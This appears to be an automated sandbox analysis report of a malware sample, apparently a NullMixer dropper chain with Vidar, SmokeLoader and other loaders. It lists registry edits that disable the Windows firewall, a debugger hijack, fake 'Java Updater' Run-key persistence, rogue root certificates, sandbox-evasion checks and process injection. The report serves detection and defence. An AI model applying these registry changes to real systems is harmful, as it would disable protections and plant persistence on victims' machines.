betabot | 5bbc833edf2e7c061fd34fe1aba85ff56746dbe0875eafcc945c264ac45193ae

Windows Service

T1543.003

Processes:

explorer.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	explorer.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"	explorer.exe

NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
dropper nullmixer
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

OnlyLogger payload 3 IoCs

Processes:

resource	yara_rule
behavioral3/memory/2344-216-0x0000000000250000-0x000000000027F000-memory.dmp	family_onlylogger
behavioral3/memory/2344-195-0x0000000000400000-0x0000000001D81000-memory.dmp	family_onlylogger
behavioral3/memory/2344-284-0x0000000000400000-0x0000000001D81000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral3/memory/1720-152-0x0000000000400000-0x0000000001DCA000-memory.dmp	family_vidar
behavioral3/memory/1720-145-0x0000000001F90000-0x000000000202D000-memory.dmp	family_vidar

Looks for VMWare services registry key. 1 TTPs 3 IoCs

evasion

Virtualization/Sandbox Evasion

T1497

Processes:

3002.exesetup.exesetup_2.tmp

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	3002.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware	setup_2.tmp

Sets file execution options in registry 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

Processes:

7A3F.exeexplorer.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\5a79sogswm.exe	7A3F.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\5a79sogswm.exe\DisableExceptionChainValidation	7A3F.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "gvyatqge.exe"	explorer.exe

ASPack v2.12-2.42 4 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\7zS497DCD36\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS497DCD36\libcurl.dll	aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS497DCD36\libcurlpp.dll	aspack_v212_v242

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

explorer.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe

Executes dropped EXE 26 IoCs

Processes:

setup_install.exeSun1477d99f5afb5a49.exeSun14d2ba445ad3.exeSun1410432520b.exeSun14eb4b7c17.exeSun14115415e7a48116.exeSun14c031e6f3d78.exeSun1479047a006c5.exeSun14c78e5159b8.exeSun1410432520b.tmpChrome 5.exePBrowFile594.exe2.exesetup.exesetup_2.exe3002.exejhuuee.exesetup_2.tmpsetup_2.exe3002.exesetup_2.tmp7A3F.exe8058.exeservices64.exesihost64.exe5a79sogswm_1.exe

pid	process
2716	setup_install.exe
2144	Sun1477d99f5afb5a49.exe
1692	Sun14d2ba445ad3.exe
2852	Sun1410432520b.exe
1688	Sun14eb4b7c17.exe
1576	Sun14115415e7a48116.exe
1720	Sun14c031e6f3d78.exe
2136	Sun1479047a006c5.exe
2192	Sun14c78e5159b8.exe
1684	Sun1410432520b.tmp
1836	Chrome 5.exe
888	PBrowFile594.exe
2968	2.exe
2344	setup.exe
1216	setup_2.exe
2316	3002.exe
2340	jhuuee.exe
712	setup_2.tmp
2324	setup_2.exe
2000	3002.exe
1924	setup_2.tmp
2392	7A3F.exe
1756	8058.exe
2076	services64.exe
2124	sihost64.exe
1656	5a79sogswm_1.exe

Loads dropped DLL 64 IoCs

Processes:

setup_installer.exesetup_install.execmd.execmd.execmd.execmd.exeSun1410432520b.execmd.exeSun14eb4b7c17.exeSun1477d99f5afb5a49.execmd.execmd.execmd.exeSun14c031e6f3d78.exeSun14c78e5159b8.exeSun1479047a006c5.exeSun1410432520b.tmpsetup.exesetup_2.exe3002.exesetup_2.tmpsetup_2.exe3002.exesetup_2.tmpWerFault.exe

pid	process
1940	setup_installer.exe
1940	setup_installer.exe
1940	setup_installer.exe
2716	setup_install.exe
2716	setup_install.exe
2716	setup_install.exe
2716	setup_install.exe
2716	setup_install.exe
2716	setup_install.exe
2716	setup_install.exe
2716	setup_install.exe
2636	cmd.exe
1608	cmd.exe
3032	cmd.exe
1040	cmd.exe
2852	Sun1410432520b.exe
2852	Sun1410432520b.exe
3032	cmd.exe
3064	cmd.exe
1688	Sun14eb4b7c17.exe
1688	Sun14eb4b7c17.exe
2144	Sun1477d99f5afb5a49.exe
2144	Sun1477d99f5afb5a49.exe
2292	cmd.exe
1456	cmd.exe
2292	cmd.exe
2536	cmd.exe
1720	Sun14c031e6f3d78.exe
1720	Sun14c031e6f3d78.exe
2192	Sun14c78e5159b8.exe
2136	Sun1479047a006c5.exe
2136	Sun1479047a006c5.exe
2192	Sun14c78e5159b8.exe
2852	Sun1410432520b.exe
1684	Sun1410432520b.tmp
1684	Sun1410432520b.tmp
1684	Sun1410432520b.tmp
2136	Sun1479047a006c5.exe
2136	Sun1479047a006c5.exe
2136	Sun1479047a006c5.exe
2136	Sun1479047a006c5.exe
2344	setup.exe
2136	Sun1479047a006c5.exe
1216	setup_2.exe
1216	setup_2.exe
2136	Sun1479047a006c5.exe
2136	Sun1479047a006c5.exe
1216	setup_2.exe
2316	3002.exe
2316	3002.exe
712	setup_2.tmp
712	setup_2.tmp
712	setup_2.tmp
712	setup_2.tmp
2316	3002.exe
2324	setup_2.exe
2324	setup_2.exe
2000	3002.exe
2000	3002.exe
2324	setup_2.exe
1924	setup_2.tmp
1924	setup_2.tmp
1924	setup_2.tmp
2112	WerFault.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

Processes:

explorer.exe3002.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Java Updater = "C:\\ProgramData\\Java Updater\\5a79sogswm.exe"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\5a79sogswm.exe\""	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\ProgramData\\Java Updater\\5a79sogswm.exe\""	3002.exe

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

Processes:

7A3F.exe3002.exesetup.exesetup_2.tmp5a79sogswm_1.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	7A3F.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3002.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup_2.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5a79sogswm_1.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

explorer.exe

description ioc process

File opened for modification C:\ProgramData\Java Updater\desktop.ini explorer.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

29 ip-api.com

description	ioc	process
File opened for modification	C:\ProgramData\Java Updater\desktop.ini	explorer.exe

flow	ioc
29	ip-api.com

Maps connected drives based on registry 3 TTPs 6 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

3002.exesetup.exesetup_2.tmp

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	3002.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	setup.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	setup_2.tmp
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	setup_2.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	3002.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs

Processes:

7A3F.exeexplorer.exe3002.exesetup.exesetup_2.tmp5a79sogswm_1.exe

pid	process
2392	7A3F.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2000	3002.exe
2344	setup.exe
2000	3002.exe
2000	3002.exe
2000	3002.exe
2344	setup.exe
1924	setup_2.tmp
2344	setup.exe
2344	setup.exe
1924	setup_2.tmp
1924	setup_2.tmp
1924	setup_2.tmp
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
1656	5a79sogswm_1.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 2076 set thread context of 2168 2076 services64.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 2076 set thread context of 2168	2076	services64.exe	explorer.exe

Program crash 7 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2112	2136	WerFault.exe	Sun1479047a006c5.exe
1716	2716	WerFault.exe
2068	1720	WerFault.exe
2600	2068	WerFault.exe	WerFault.exe
1484	2144	WerFault.exe	Sun1477d99f5afb5a49.exe
480	1940	WerFault.exe	setup_installer.exe
2852	480	WerFault.exe	WerFault.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

Sun14eb4b7c17.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun14eb4b7c17.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun14eb4b7c17.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun14eb4b7c17.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

explorer.exe5a79sogswm_1.exe7A3F.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	explorer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	5a79sogswm_1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	5a79sogswm_1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	7A3F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	7A3F.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2264 schtasks.exe
2736 schtasks.exe

pid	process
2264	schtasks.exe
2736	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

explorer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	explorer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	explorer.exe

Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs

Modify Registry

Processes:

explorer.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3"	explorer.exe

Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs

Modify Registry

Processes:

explorer.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"	explorer.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

explorer.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Internet Explorer\Main	explorer.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

Sun14c031e6f3d78.exeservices64.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun14c031e6f3d78.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun14c031e6f3d78.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun14c031e6f3d78.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	services64.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	services64.exe

NTFS ADS 4 IoCs

Processes:

explorer.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\5a79sogswm_1.exe:1BB7FB68	explorer.exe
File created	C:\Users\Admin\AppData\Local\Temp\5a79sogswm_1.exe:1BB7FB68	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Roaming\services64.exe"	explorer.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Roaming\0f777caf.lnk	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Sun14eb4b7c17.exepowershell.exeExplorer.EXE

pid	process
1688	Sun14eb4b7c17.exe
1688	Sun14eb4b7c17.exe
848	powershell.exe
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE
1144	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

setup_2.tmp

pid process

1924 setup_2.tmp

pid	process
1924	setup_2.tmp

Suspicious behavior: MapViewOfSection 32 IoCs

Processes:

Sun14eb4b7c17.exe7A3F.exeexplorer.exe

pid	process
1688	Sun14eb4b7c17.exe
2392	7A3F.exe
2392	7A3F.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe
2904	explorer.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

PBrowFile594.exe2.exeSun14d2ba445ad3.exepowershell.exe7A3F.exeChrome 5.exeservices64.exeexplorer.exeExplorer.EXEexplorer.exe5a79sogswm_1.exe

description	pid	process
Token: SeDebugPrivilege	888	PBrowFile594.exe
Token: SeDebugPrivilege	2968	2.exe
Token: SeDebugPrivilege	1692	Sun14d2ba445ad3.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	2392	7A3F.exe
Token: SeRestorePrivilege	2392	7A3F.exe
Token: SeBackupPrivilege	2392	7A3F.exe
Token: SeLoadDriverPrivilege	2392	7A3F.exe
Token: SeCreatePagefilePrivilege	2392	7A3F.exe
Token: SeShutdownPrivilege	2392	7A3F.exe
Token: SeTakeOwnershipPrivilege	2392	7A3F.exe
Token: SeChangeNotifyPrivilege	2392	7A3F.exe
Token: SeCreateTokenPrivilege	2392	7A3F.exe
Token: SeMachineAccountPrivilege	2392	7A3F.exe
Token: SeSecurityPrivilege	2392	7A3F.exe
Token: SeAssignPrimaryTokenPrivilege	2392	7A3F.exe
Token: SeCreateGlobalPrivilege	2392	7A3F.exe
Token: 33	2392	7A3F.exe
Token: SeDebugPrivilege	1836	Chrome 5.exe
Token: SeDebugPrivilege	2076	services64.exe
Token: SeDebugPrivilege	2904	explorer.exe
Token: SeRestorePrivilege	2904	explorer.exe
Token: SeBackupPrivilege	2904	explorer.exe
Token: SeLoadDriverPrivilege	2904	explorer.exe
Token: SeCreatePagefilePrivilege	2904	explorer.exe
Token: SeShutdownPrivilege	2904	explorer.exe
Token: SeTakeOwnershipPrivilege	2904	explorer.exe
